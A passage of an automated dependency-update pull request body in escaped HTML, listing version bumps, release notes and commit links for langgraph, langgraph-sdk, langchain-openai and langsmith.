href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7890\"\u003e#7890\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph==1.2.1\u003c/h2\u003e\n\u003cp\u003eChanges since 1.2.0\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(langgraph): 1.2.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7883\"\u003e#7883\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): add \u003ccode\u003ebefore_builtins\u003c/code\u003e opt-in for stream transformers (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7882\"\u003e#7882\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump idna from 3.11 to 3.15 in /libs/langgraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7866\"\u003e#7866\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(langgraph): keep tool results out of v3 messages (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7838\"\u003e#7838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump langsmith from 0.7.31 to 0.8.0 in /libs/langgraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7788\"\u003e#7788\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/7ab79f9f3e94fb4357334d902f5fd69ec0088eb4\"\u003e\u003ccode\u003e7ab79f9\u003c/code\u003e\u003c/a\u003e release(langgraph): 1.2.5 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8062\"\u003e#8062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/385033fd9cfc356a0ed9028bef53f5490e9c0939\"\u003e\u003ccode\u003e385033f\u003c/code\u003e\u003c/a\u003e fix(langgraph): merge \u003ccode\u003elc_versions\u003c/code\u003e config metadata (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8052\"\u003e#8052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/93307d6a427d7f15bcba3264f3774d07af7d7dca\"\u003e\u003ccode\u003e93307d6\u003c/code\u003e\u003c/a\u003e release(cli): 0.4.29 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8046\"\u003e#8046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/e05ba2965db5373c14ada7ddb3740d9b59a28206\"\u003e\u003ccode\u003ee05ba29\u003c/code\u003e\u003c/a\u003e feat(cli): add support for passing certfile and cert key to run dev server un...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/f0e814796be5e4a27f58a6979064ba35fb39bcf1\"\u003e\u003ccode\u003ef0e8147\u003c/code\u003e\u003c/a\u003e release(cli): 0.4.28 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8041\"\u003e#8041\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/d57a74f950b87bfb9cb51240cc8dccf34b5edfaa\"\u003e\u003ccode\u003ed57a74f\u003c/code\u003e\u003c/a\u003e fix: updateState bug for deltaChannel on empty thread (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8011\"\u003e#8011\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/6f83cc9dc2a24c7884ae7da20c9f39f469be35d7\"\u003e\u003ccode\u003e6f83cc9\u003c/code\u003e\u003c/a\u003e chore(deps): bump starlette from 1.0.0 to 1.0.1 in /libs/cli (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8005\"\u003e#8005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/2ae62c6f870660deb620d7008035f9c4848bfc58\"\u003e\u003ccode\u003e2ae62c6\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump starlette from 1.0.0 to 1.0.1 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8006\"\u003e#8006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/2b1abc807b282245211f5ba8f292aaf3e24f1e07\"\u003e\u003ccode\u003e2b1abc8\u003c/code\u003e\u003c/a\u003e chore: migrate Python type checking to ty (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/8002\"\u003e#8002\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/43682f0830f312822f18206dfa18c599becbff38\"\u003e\u003ccode\u003e43682f0\u003c/code\u003e\u003c/a\u003e chore(deps): bump the minor-and-patch group in /libs/cli with 4 updates (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7962\"\u003e#7962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langgraph/compare/1.2.0...1.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langgraph-sdk` from 0.3.14 to 0.4.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langgraph/releases\"\u003elanggraph-sdk's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elanggraph-sdk==0.4.2\u003c/h2\u003e\n\u003cp\u003eChanges since sdk==0.4.1\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(sdk-py): 0.4.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7955\"\u003e#7955\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(sdk-py): percent-encode thread_id in v3 stream transport default paths (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7954\"\u003e#7954\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph-sdk==0.4.1\u003c/h2\u003e\n\u003cp\u003eChanges since sdk==0.4.0\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(sdk-py): 0.4.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7944\"\u003e#7944\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): extract stream decoders and add interleave_projections (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7935\"\u003e#7935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(langgraph): add v3 streaming support to RemoteGraph (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7927\"\u003e#7927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(sdk-py): make \u003ccode\u003etools_agent\u003c/code\u003e fake model stateless (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7930\"\u003e#7930\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph-sdk==0.4.0\u003c/h2\u003e\n\u003cp\u003eChanges since sdk==0.3.15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(sdk-py): 0.4.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7923\"\u003e#7923\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add thread stream helpers (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7833\"\u003e#7833\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): wire websocket stream selection (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7832\"\u003e#7832\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add websocket stream transports (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7830\"\u003e#7830\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): harden streaming reconnects (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7829\"\u003e#7829\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add sync scoped subgraphs (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7828\"\u003e#7828\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add sync messages and tool calls (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7827\"\u003e#7827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add sync thread stream core (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7826\"\u003e#7826\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add async stream reconnect support (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7825\"\u003e#7825\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add scoped subgraph handles (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7824\"\u003e#7824\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add messages and tool call projections (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7823\"\u003e#7823\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add output, values, and controller extraction (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7822\"\u003e#7822\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): wire lifecycle state and output prerequisites (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7821\"\u003e#7821\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add shared stream subscriptions (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7820\"\u003e#7820\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add async thread stream skeleton (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7819\"\u003e#7819\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): add v3 streaming primitives and SSE transport (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7818\"\u003e#7818\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(langgraph): bump version to 1.2.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7914\"\u003e#7914\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003elanggraph-sdk==0.3.15\u003c/h2\u003e\n\u003cp\u003eChanges since sdk==0.3.14\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erelease(checkpoint): 4.1.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7890\"\u003e#7890\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease(sdk-py): 0.3.15 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7891\"\u003e#7891\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(sdk-py): percent-encode caller-supplied identifiers in URL paths (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7893\"\u003e#7893\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease(langgraph): 1.2.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7883\"\u003e#7883\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump idna from 3.11 to 3.15 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7863\"\u003e#7863\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump urllib3 from 2.6.3 to 2.7.0 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7764\"\u003e#7764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump langsmith from 0.7.31 to 0.8.0 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7789\"\u003e#7789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erelease: bump alpha packages to official versions (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7775\"\u003e#7775\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(langgraph): bump langchain-core to 1.4.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7767\"\u003e#7767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efeat(sdk-py): support metadata filter for crons search/count (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7737\"\u003e#7737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore(deps): bump ty from 0.0.23 to 0.0.33 in /libs/sdk-py (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/7666\"\u003e#7666\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/4aeaffef4e0d14de09fa4e34636372cb01992c6a\"\u003e\u003ccode\u003e4aeaffe\u003c/code\u003e\u003c/a\u003e 0.4.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4570\"\u003e#4570\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/f1bfd6051a7a3e840c3a9ddc437a2e7f14dd41c8\"\u003e\u003ccode\u003ef1bfd60\u003c/code\u003e\u003c/a\u003e update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/998be75f3430d87f5fa361c790b41ae8314fc64e\"\u003e\u003ccode\u003e998be75\u003c/code\u003e\u003c/a\u003e langgraph: decouple name from assistant ID in RemoteGraph\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/365dd5f459e2bd9f4fcf38805837fc8cf9356869\"\u003e\u003ccode\u003e365dd5f\u003c/code\u003e\u003c/a\u003e sdk-py: Prefix private functions in sdk with _\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/0e61cc2cf6100e0e053614bc2c5dcdeec04b07a8\"\u003e\u003ccode\u003e0e61cc2\u003c/code\u003e\u003c/a\u003e prebuilt: remove state_modifier (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4439\"\u003e#4439\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/a0a302dec50af869c07851210f3a9dd77200e8a0\"\u003e\u003ccode\u003ea0a302d\u003c/code\u003e\u003c/a\u003e prebuilt: switch to executing parallel tool calls via Send by default (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4438\"\u003e#4438\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/4e05db85374a652c8ddfa26b9adb9ff638fce581\"\u003e\u003ccode\u003e4e05db8\u003c/code\u003e\u003c/a\u003e Release checkpoint-sqlite (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4509\"\u003e#4509\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/d6e20e6d093a4fe53cb04afa5af8a5b3d3b8ef31\"\u003e\u003ccode\u003ed6e20e6\u003c/code\u003e\u003c/a\u003e Add missing 'running' RunStatus (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4508\"\u003e#4508\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/fcd06acd3365aa2c7ba5091349a6f850aedd09c4\"\u003e\u003ccode\u003efcd06ac\u003c/code\u003e\u003c/a\u003e Add support for specifying a custom base image in docker commands (\u003ca href=\"https://redirect.github.com/langchain-ai/langgraph/issues/4500\"\u003e#4500\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langgraph/commit/94994a8d995596c1a3c035572062987c71811d83\"\u003e\u003ccode\u003e94994a8\u003c/code\u003e\u003c/a\u003e meaningless commit to get vercel going sigh\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langgraph/compare/0.3.14...0.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langchain-openai` from 1.2.1 to 1.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain/releases\"\u003elangchain-openai's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain-openai==1.3.2\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-openai==1.3.1\u003c/p\u003e\n\u003cp\u003erelease(openai): 1.3.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38130\"\u003e#38130\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain-openai==1.3.1\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-openai==1.3.0\u003c/p\u003e\n\u003cp\u003edocs: refresh \u003ccode\u003eREADME\u003c/code\u003e installation and resources (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38119\"\u003e#38119\u003c/a\u003e)\ntest(core,langchain): update tests for explicit deserialization allowlists (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38118\"\u003e#38118\u003c/a\u003e)\nrelease(core): 1.4.7 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38111\"\u003e#38111\u003c/a\u003e)\nfix(core,partners): rename package version trace metadata (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38110\"\u003e#38110\u003c/a\u003e)\nstyle(core,langchain,langchain-classic,partners): replace double backticks in docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38095\"\u003e#38095\u003c/a\u003e)\ntest(openai): use \u003ccode\u003egpt-4o\u003c/code\u003e for image token counting (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38089\"\u003e#38089\u003c/a\u003e)\nrelease(core): 1.4.6 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38061\"\u003e#38061\u003c/a\u003e)\nfeat(core,partners): add package version tracking to tracing metadata (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/35295\"\u003e#35295\u003c/a\u003e)\nfix(core,openai): normalize v1 streamed tool calls (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/35983\"\u003e#35983\u003c/a\u003e)\nchore(infra): bump mypy to 2.1 and unify type-check config across the monorepo (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/36470\"\u003e#36470\u003c/a\u003e)\nfeat(standard-tests): validate tool call chunks during streaming (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34707\"\u003e#34707\u003c/a\u003e)\nfix(langchain): tighten structured output model fallbacks (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38042\"\u003e#38042\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain-openai==1.3.0\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-openai==1.2.2\u003c/p\u003e\n\u003cp\u003ehotfix(openai): min core dep (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37990\"\u003e#37990\u003c/a\u003e)\nrelease(openai): 1.3.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37989\"\u003e#37989\u003c/a\u003e)\nfeat(openai): support \u003ccode\u003eapply_patch\u003c/code\u003e built-in tool (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37157\"\u003e#37157\u003c/a\u003e)\nchore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37973\"\u003e#37973\u003c/a\u003e)\ntest(langchain,partners): disable pytest-benchmark under xdist to silence \u003ccode\u003ePytestBenchmarkWarning\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37901\"\u003e#37901\u003c/a\u003e)\nchore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37895\"\u003e#37895\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain-openai==1.2.2\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-openai==1.2.1\u003c/p\u003e\n\u003cp\u003erelease(openai): 1.2.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37617\"\u003e#37617\u003c/a\u003e)\nchore(infra): bump \u003ccode\u003elangchain-tests\u003c/code\u003e floor to 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37610\"\u003e#37610\u003c/a\u003e)\ntest(openai): unbreak audio chat and Azure embedding integration tests (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37589\"\u003e#37589\u003c/a\u003e)\nfix(openai): guard httpx finalizers (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37570\"\u003e#37570\u003c/a\u003e)\nchore: bump langsmith from 0.8.4 to 0.8.5 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37549\"\u003e#37549\u003c/a\u003e)\nchore: bump idna from 3.11 to 3.15 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37548\"\u003e#37548\u003c/a\u003e)\nci(infra): harden Dependabot version-bound preservation (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37510\"\u003e#37510\u003c/a\u003e)\ntest(standard-tests): assert \u003ccode\u003els_model_name\u003c/code\u003e honors per-call model override (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37504\"\u003e#37504\u003c/a\u003e)\nfix(openai): source LLM context size from model profiles (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37489\"\u003e#37489\u003c/a\u003e)\nchore(core,langchain,openai): refresh stale OpenAI model references (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37487\"\u003e#37487\u003c/a\u003e)\nfix(openai): broaden condition for ContextOverflowError to accommodate other providers (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37457\"\u003e#37457\u003c/a\u003e)\ndocs(openai): document \u003ccode\u003ebase_url\u003c/code\u003e env var fallback chain (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37436\"\u003e#37436\u003c/a\u003e)\nchore: bump langsmith from 0.8.0 to 0.8.4 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37416\"\u003e#37416\u003c/a\u003e)\nchore: bump langsmith from 0.7.31 to 0.8.0 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37398\"\u003e#37398\u003c/a\u003e)\nchore(infra): merge v1.4 into master (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37350\"\u003e#37350\u003c/a\u003e)\nchore: bump urllib3 from 2.6.3 to 2.7.0 in /libs/partners/openai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37330\"\u003e#37330\u003c/a\u003e)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/879cad06769913c8329d72e700263537ff436053\"\u003e\u003ccode\u003e879cad0\u003c/code\u003e\u003c/a\u003e release(openai): 1.3.2 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38130\"\u003e#38130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/37b339f8c468f4c6ba82514629e631c189c4fc50\"\u003e\u003ccode\u003e37b339f\u003c/code\u003e\u003c/a\u003e fix(openai): build Codex async headers off the event loop in \u003ccode\u003e_agenerate\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/11429a9e1c37efccd1da92246d6f5b878a2af74a\"\u003e\u003ccode\u003e11429a9\u003c/code\u003e\u003c/a\u003e fix(openai): avoid sync token reads in Codex streaming (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38128\"\u003e#38128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/454e19588c027b97ea54f5d079a19798b229b84f\"\u003e\u003ccode\u003e454e195\u003c/code\u003e\u003c/a\u003e hotfix(openai): skip Codex live integration tests in CI (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38124\"\u003e#38124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/9e6f58ba4650904f161bea80337566cf3751fccc\"\u003e\u003ccode\u003e9e6f58b\u003c/code\u003e\u003c/a\u003e hotfix(openai): switch version (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38123\"\u003e#38123\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/bf7b0180f2e5ccc71b15143e14622ba4e132c421\"\u003e\u003ccode\u003ebf7b018\u003c/code\u003e\u003c/a\u003e refactor(openai): mark Codex OAuth classes private (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38122\"\u003e#38122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/34af8839c341bcd12e246634c1b6d75532fb1ee8\"\u003e\u003ccode\u003e34af883\u003c/code\u003e\u003c/a\u003e chore(infra): wire up per-partner version-consistency pre-commit hooks (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38121\"\u003e#38121\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/8180a09dd7712e231f501c1795985b7bacba8735\"\u003e\u003ccode\u003e8180a09\u003c/code\u003e\u003c/a\u003e release(openai): 1.4.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38120\"\u003e#38120\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/6c2b70e60e51de9987b2a96529f18c5ff8559a0d\"\u003e\u003ccode\u003e6c2b70e\u003c/code\u003e\u003c/a\u003e feat(openai): add ChatGPT OAuth-backed \u003ccode\u003eChatOpenAICodex\u003c/code\u003e chat model (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37569\"\u003e#37569\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/63cc1f4e7d3dbaaa284d25ddac89cafe35bd8874\"\u003e\u003ccode\u003e63cc1f4\u003c/code\u003e\u003c/a\u003e docs: refresh \u003ccode\u003eREADME\u003c/code\u003e installation and resources (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38119\"\u003e#38119\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langchain/compare/langchain-openai==1.2.1...langchain-openai==1.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langsmith` from 0.8.5 to 0.8.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/releases\"\u003elangsmith's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.15\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore(js): exclude generated _openapi_client from linters and type-checker by \u003ca href=\"https://github.com/KiewanVillatel\"\u003e\u003ccode\u003e@​KiewanVillatel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/3015\"\u003elangchain-ai/langsmith-sdk#3015\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: sync langsmith_api by \u003ca href=\"https://github.com/langtions-bot\"\u003e\u003ccode\u003e@​langtions-bot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca 